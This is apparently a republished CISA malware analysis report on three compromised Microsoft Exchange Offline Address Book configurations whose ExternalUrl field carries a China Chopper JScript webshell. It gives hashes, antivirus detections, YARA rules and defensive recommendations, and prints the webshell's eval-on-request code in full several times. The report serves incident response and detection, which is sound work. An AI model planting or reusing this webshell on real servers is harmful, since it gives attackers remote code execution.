This article is contributed. See the original author and article here.

Malware Analysis Report

10329496.r1.v1

2021-03-19

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

CISA received three unique files for analysis. These files appear to contain configuration data for three Microsoft Exchange Offline Address Book (OAB) Virtual Directories (VD). The files show malicious modifications for the ExternalUrl parameter for the OAB VDs in the targeted Exchange Servers. The ExternalUrl parameter contains a variant of the “China Chopper” webshell, which may permit a remote operator to dynamically execute JavaScript code on the compromised server.

 

For a downloadable copy of IOCs, see: MAR-10329496-1.v1.stix.

Submitted Files (3)

2e1eb00575e1a8f6c95a23c87b05e23eb4718557f787aa905bb000e98b31c5f0 (discover.aspx)

695d4a81ce526a136351cd8eeba5c452d0ab79438fe467922a0bd61db87cef93 (supp0rt.aspx)

b67a11f17434f5ee501cc1d2acab2da14ae8dfc5a27dc00bbd7652425d5c3d23 (shell.aspx)

Findings

695d4a81ce526a136351cd8eeba5c452d0ab79438fe467922a0bd61db87cef93

Tags

backdoortrojanwebshell

Details
Name supp0rt.aspx
Size 2318 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 77318f5e9fc9b143a7877d7db5fe1002
SHA1 b6b0bc7c2552d999b5cece361c37228f811c2d23
SHA256 695d4a81ce526a136351cd8eeba5c452d0ab79438fe467922a0bd61db87cef93
SHA512 a060930cfadbe5565d874ca57b871fe4988ae58ad6a14b9356bcccdf35b3cd03ea523e53aa20e5c6e19f8a7a92efa52cd54fffa41444b004a619e769938ce727
ssdeep 48:kNrdeG1BO0vEsFkQaM5QZXh6t84ONF0qx:ktdeGpvEsWQVONCqx
Entropy 4.764649
Antivirus
Ahnlab Exploit/ASP.Cve-2021-27065.S1406
Avira EXP/CVE-2021-27065.1
BitDefender Generic.ASP.WebShell.I.3153A114
ClamAV Asp.Trojan.Webshell0321-9840173-0
Emsisoft Generic.ASP.WebShell.I.3153A114 (B)
Ikarus Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.I.3153A114
McAfee Exploit-CVE2021-27065.a
Microsoft Security Essentials Exploit:ASP/CVE-2021-27065.B!dha
Quick Heal CVE-2021-26855.Webshll.41381
Sophos Troj/WebShel-O
Symantec Trojan.Chinchop
TrendMicro Backdoo.DDEA7357
TrendMicro House Call Backdoo.DDEA7357
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit CVE_2021_27065
    {
       meta:
           Author = “CISA Code & Media Analysis”
           Incident = “10328929”
           Date = “2021-03-17”
           Last_Modified = “20210317_2200”
           Actor = “n/a”
           Category = “Trojan WebShell Exploit CVE-2021-27065”
           Family = “HAFNIUM”
           Description = “Detects CVE-2021-27065 Webshellz”
           MD5_1 = “ab3963337cf24dc2ade6406f11901e1f”
           SHA256_1 = “c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5”
       strings:
           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }
           $s1 = { 65 76 61 6C 28 }
           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }
           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
       condition:
           $s0 or ($s1 and $s2) or ($s3 and $s4)
    }
  • rule CISA_10328929_02 : trojan webshell exploit CVE_2021_27065
    {
       meta:
           Author = “CISA Code & Media Analysis”
           Incident = “10328929”
           Date = “2021-03-17”
           Last_Modified = “20210317_2200”
           Actor = “n/a”
           Category = “Trojan WebShell Exploit CVE-2021-27065”
           Family = “HAFNIUM”
           Description = “Detects CVE-2021-27065 Exchange OAB VD MOD”
           MD5_1 = “ab3963337cf24dc2ade6406f11901e1f”
           SHA256_1 = “c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5”
       strings:
           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }
           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }
           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }
       condition:
           $s0 and $s1 and $s2
    }
ssdeep Matches

No matches found.

Description

This file is an OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a variant of the “China Chopper” webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against a targeted Microsoft Exchange server.

In this file, the ExternalUrl designation that normally specifies the Uniform Resource Locator (URL) used to connect to the virtual directory from outside the firewall has been replaced with the following code:

—Begin Code—
hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request.Item[“81b78f301d7476b2f6cd8442e572e5e5″])),”unsafe”);}</script>
—End Code—

This file contains the following configuration data (sensitive data was redacted):

—Begin Configuration For Compromised OAB VD—
Name                            : OAB (Default Web Site)
PollInterval                    : 480
OfflineAddressBooks             :
RequireSSL                     : True
BasicAuthentication             : False
WindowsAuthentication         : True
OAuthAuthentication             : False
MetabasePath                    : IIS://EXCHANGE2013.REDACTED.local/W3SVC/1/ROOT/OAB
Path                            : C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyOAB
ExtendedProtectionTokenChecking : None
ExtendedProtectionFlags         :
ExtendedProtectionSPNList     :
AdminDisplayVersion             : Version 15.0 (Build 1347.2)
Server                         : EXCHANGE2013
InternalUrl                     : hxxps[:]//exchange2013.REDACTED.local/OAB
InternalAuthenticationMethods : WindowsIntegrated
ExternalUrl                     : hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request.Item[“81b78f301d7476b2f6cd8442e572e5e5″])),”unsafe”);}</script>
ExternalAuthenticationMethods : WindowsIntegrated
AdminDisplayName                :
ExchangeVersion                 : 0.10 (14.0.100.0)
DistinguishedName             : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=EXCHANGE2013,CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=REDACTED,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=REDACTED,DC=local
Identity                        : EXCHANGE2013OAB (Default Web Site)
Guid                            : be693b93-97dd-4440-a21d-b8c7dd6fa764
ObjectCategory                 : REDACTED.local/Configuration/Schema/ms-Exch-OAB-Virtual-Directory
ObjectClass                     : top
                                msExchVirtualDirectory
                                msExchOABVirtualDirectory
WhenChanged                     : 3/5/2021 10:36:49 AM
WhenCreated                     : 3/2/2021 6:41:34 PM
WhenChangedUTC                 : 3/5/2021 3:36:49 PM
WhenCreatedUTC                 : 3/2/2021 11:41:34 PM
OrganizationId                 :
Id                             : EXCHANGE2013OAB (Default Web Site)
OriginatingServer             : DC2.REDACTED.local
IsValid                         : True
—End Configuration For Compromised OAB VD—

b67a11f17434f5ee501cc1d2acab2da14ae8dfc5a27dc00bbd7652425d5c3d23

Tags

backdoortrojanwebshell

Details
Name shell.aspx
Size 2356 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 f88faa6206a64bba867f62b435e89f93
SHA1 cbae4913e74da487217f4bee1964482b9c382ad1
SHA256 b67a11f17434f5ee501cc1d2acab2da14ae8dfc5a27dc00bbd7652425d5c3d23
SHA512 f2644beb27033cb0ce2ef4dff4dc7878357d2e3ecf3bd9d61eaf75613cf2343d7ebcbb81015d944e0f0089dbcf9b6b2450223f24c9a82b707f74fa62a0e7986e
ssdeep 48:k/GDrdlNCVBfB67/IPQZthCcsw4ONF0qh:ke3deL07OcfNCqh
Entropy 4.647766
Antivirus
Ahnlab Exploit/ASP.Cve-2021-27065.S1406
Avira EXP/CVE-2021-27065.1
BitDefender Generic.ASP.WebShell.H.E7D48A2A
ClamAV Asp.Trojan.Webshell0321-9840176-0
Emsisoft Generic.ASP.WebShell.H.E7D48A2A (B)
Ikarus Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.E7D48A2A
McAfee Exploit-CVE2021-27065.a
Microsoft Security Essentials Exploit:ASP/CVE-2021-27065
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
TrendMicro Backdoo.DDEA7357
TrendMicro House Call Backdoo.DDEA7357
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit CVE_2021_27065
    {
       meta:
           Author = “CISA Code & Media Analysis”
           Incident = “10328929”
           Date = “2021-03-17”
           Last_Modified = “20210317_2200”
           Actor = “n/a”
           Category = “Trojan WebShell Exploit CVE-2021-27065”
           Family = “HAFNIUM”
           Description = “Detects CVE-2021-27065 Webshellz”
           MD5_1 = “ab3963337cf24dc2ade6406f11901e1f”
           SHA256_1 = “c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5”
       strings:
           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }
           $s1 = { 65 76 61 6C 28 }
           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }
           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
       condition:
           $s0 or ($s1 and $s2) or ($s3 and $s4)
    }
  • rule CISA_10328929_02 : trojan webshell exploit CVE_2021_27065
    {
       meta:
           Author = “CISA Code & Media Analysis”
           Incident = “10328929”
           Date = “2021-03-17”
           Last_Modified = “20210317_2200”
           Actor = “n/a”
           Category = “Trojan WebShell Exploit CVE-2021-27065”
           Family = “HAFNIUM”
           Description = “Detects CVE-2021-27065 Exchange OAB VD MOD”
           MD5_1 = “ab3963337cf24dc2ade6406f11901e1f”
           SHA256_1 = “c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5”
       strings:
           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }
           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }
           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }
       condition:
           $s0 and $s1 and $s2
    }
ssdeep Matches

No matches found.

Description

This file is an OAB configuration file. The Microsoft Exchange OAB virtual directory is utilized to access Microsoft Exchange offline address lists. The OAB ExternalUrl parameter has been modified by a remote operator to include a variant of the “China Chopper” webshell, which is likely an attempt to gain unauthorized access for dynamic remote code execution against the targeted Exchange server. The modification of the ExternalUrl parameter suggests the operator can dynamically submit queries to this Exchange OAB virtual directory containing JavaScript code that can be executed on the target system.

In this file, the ExternalUrl designation that normally specifies the URL used to connect to the virtual directory from outside the firewall has been replaced with the following code:

—Begin Code—
hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“[REDACTED]”],”unsafe”);}</script>
—End Code—

Note: The hard-coded key used for authentication was redacted from the code above.

This file contains the following configuration data (sensitive data was redacted):

Name                            : OAB (Default Web Site)
PollInterval                    : 480
OfflineAddressBooks             : Default Offline Address List (Ex2012)
RequireSSL                     : True
BasicAuthentication             : False
WindowsAuthentication         : True
OAuthAuthentication             : True
MetabasePath                    : IIS://[REDACTED]EXCHANGE.REDACTED.us/W3SVC/1/ROOT/OAB
Path                            : E:Program FilesMicrosoftExchange serverV15FrontEndHttpProxyOAB
ExtendedProtectionTokenChecking : None
ExtendedProtectionFlags         :
ExtendedProtectionSPNList     :
AdminDisplayVersion             : Version 15.2 (Build 595.3)
Server                         : [REDACTED]EXCHANGE
InternalUrl                     : hxxps[:]//webmail.REDACTED.us/OAB
InternalAuthenticationMethods : OAuth
                                WindowsIntegrated
ExternalUrl                     : hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“[REDACTED]”],”unsafe”);}</script>ExternalAuthenticationMethods : OAuth
                                WindowsIntegrated
AdminDisplayName                :
ExchangeVersion                 : 0.10 (14.0.100.0)
DistinguishedName             : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=[REDACTED]EXCHANGE,CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=REDACTED,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=REDACTED,DC=XXX,DC=XX,DC=us
Identity                        : [REDACTED]EXCHANGEOAB (Default Web Site)
Guid                            : e5b25844-34da-4b54-a4f4-0ef2d1083223
ObjectCategory                 : REDACTED.us/Configuration/Schema/ms-Exch-OAB-Virtual-Directory
ObjectClass                     : top
                                msExchVirtualDirectory
                                msExchOABVirtualDirectory
WhenChanged                     : 3/4/2021 4:56:45 AM
WhenCreated                     : 3/6/2020 1:18:06 PM
WhenChangedUTC                 : 3/4/2021 9:56:45 AM
WhenCreatedUTC                 : 3/6/2020 6:18:06 PM
OrganizationId                 :
Id                             : [REDACTED]EXCHANGEOAB (Default Web Site)
OriginatingServer             : REDACTED.us
IsValid                         : True

2e1eb00575e1a8f6c95a23c87b05e23eb4718557f787aa905bb000e98b31c5f0

Tags

backdoortrojanwebshell

Details
Name discover.aspx
Size 2300 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 dd047e0a44ae22e6c68163e2e70f6a14
SHA1 c9e1f5af069c2ee83657299f9cec1181d1045716
SHA256 2e1eb00575e1a8f6c95a23c87b05e23eb4718557f787aa905bb000e98b31c5f0
SHA512 b598820abb1d08061796d1cc6576f935f408ec69b22cc87e94bd6e5248d9699df3ad9c2767e6b70f1e753e0e0195d6df70c340c677f8a92f051e0d3307179430
ssdeep 48:k6DrdDdBgm6oIPQZJbhGlpoK4ONF0qsbBMv:kWdA9sYlpLNCqsbBMv
Entropy 4.571273
Antivirus
Ahnlab Exploit/ASP.Cve-2021-27065.S1406
Avira EXP/CVE-2021-27065.1
BitDefender Generic.ASP.WebShell.H.13A3EBC8
ClamAV Asp.Trojan.Webshell0321-9840176-0
Emsisoft Generic.ASP.WebShell.H.13A3EBC8 (B)
Ikarus Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.13A3EBC8
McAfee Exploit-CVE2021-27065.a
Microsoft Security Essentials Exploit:ASP/CVE-2021-27065
Quick Heal CVE-2021-26855.Webshll.41381
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
TrendMicro Backdoo.DDEA7357
TrendMicro House Call Backdoo.DDEA7357
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit CVE_2021_27065
    {
       meta:
           Author = “CISA Code & Media Analysis”
           Incident = “10328929”
           Date = “2021-03-17”
           Last_Modified = “20210317_2200”
           Actor = “n/a”
           Category = “Trojan WebShell Exploit CVE-2021-27065”
           Family = “HAFNIUM”
           Description = “Detects CVE-2021-27065 Webshellz”
           MD5_1 = “ab3963337cf24dc2ade6406f11901e1f”
           SHA256_1 = “c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5”
       strings:
           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }
           $s1 = { 65 76 61 6C 28 }
           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }
           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
       condition:
           $s0 or ($s1 and $s2) or ($s3 and $s4)
    }
  • rule CISA_10328929_02 : trojan webshell exploit CVE_2021_27065
    {
       meta:
           Author = “CISA Code & Media Analysis”
           Incident = “10328929”
           Date = “2021-03-17”
           Last_Modified = “20210317_2200”
           Actor = “n/a”
           Category = “Trojan WebShell Exploit CVE-2021-27065”
           Family = “HAFNIUM”
           Description = “Detects CVE-2021-27065 Exchange OAB VD MOD”
           MD5_1 = “ab3963337cf24dc2ade6406f11901e1f”
           SHA256_1 = “c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5”
       strings:
           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }
           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }
           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }
       condition:
           $s0 and $s1 and $s2
    }
ssdeep Matches

No matches found.

Description

This file is an OAB configuration file. The Exchange OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a “China Chopper” webshell, which is likely an attempt to gain unauthorized access for dynamic remote code execution against a targeted Microsoft Exchange Server. The OAB ExternalUrl parameter was configured to accept JavaScript code that will be directly executed on the target system. The modification of the ExternalUrl parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.

—Begin Code—
hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“[REDACTED]”],”unsafe”);}</script>
—End Code—

Note: The hard-coded key used for authentication was redacted from the code above.

The file contains the following configuration data (sensitive data was redacted):

—Begin Configuration For Compromised OAB VD—
Name                            : OAB (Default Web Site)
PollInterval                    : 480
OfflineAddressBooks             : Default Offline Address Book
RequireSSL                     : True
BasicAuthentication             : False
WindowsAuthentication         : True
OAuthAuthentication             : True
MetabasePath                    : IIS://REDACTED.org/W3SVC/1/ROOT/OAB
Path                            : F:Exchange v15FrontEndHttpProxyOAB
ExtendedProtectionTokenChecking : None
ExtendedProtectionFlags         :
ExtendedProtectionSPNList     :
AdminDisplayVersion             : Version 15.1 (Build 1531.3)
Server                         : HOPEMAIL
InternalUrl                     : hxxps[:]//REDACTED.org/OAB
InternalAuthenticationMethods : OAuth
                                WindowsIntegrated
ExternalUrl                     : hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“[REDACTED]”],”unsafe”);}</script>
ExternalAuthenticationMethods : OAuth
                                WindowsIntegrated
AdminDisplayName                :
ExchangeVersion                 : 0.10 (14.0.100.0)
DistinguishedName             : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=REDACTED,CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=REDACTED,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=REDACTED,DC=org
Identity                        : REDACTEDOAB (Default Web Site)
Guid                            : e17ad2b6-f8aa-4a8d-9be6-3f038a0737ef
ObjectCategory                 : REDACTED.org/Configuration/Schema/ms-Exch-OAB-Virtual-Directory
ObjectClass                     : top
                                msExchVirtualDirectory
                                msExchOABVirtualDirectory
WhenChanged                     : 3/3/2021 10:52:32 AM
WhenCreated                     : 10/26/2018 3:14:33 PM
WhenChangedUTC                 : 3/3/2021 3:52:32 PM
WhenCreatedUTC                 : 10/26/2018 7:14:33 PM
OrganizationId                 :
Id                             : REDACTEDOAB (Default Web Site)
OriginatingServer             : REDACTED.org
IsValid                         : True
—End Configuration For Compromised OAB VD—

Mitigation

If you find these webshells as you are examining your system for Microsoft Exchange Vulnerabilities, please visit the https://us-cert.cisa.gov/remediating-microsoft-exchange-vulnerabilities website for further information on remediation.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Brought to you by Dr. Ware, Microsoft Office 365 Silver Partner, Charleston SC.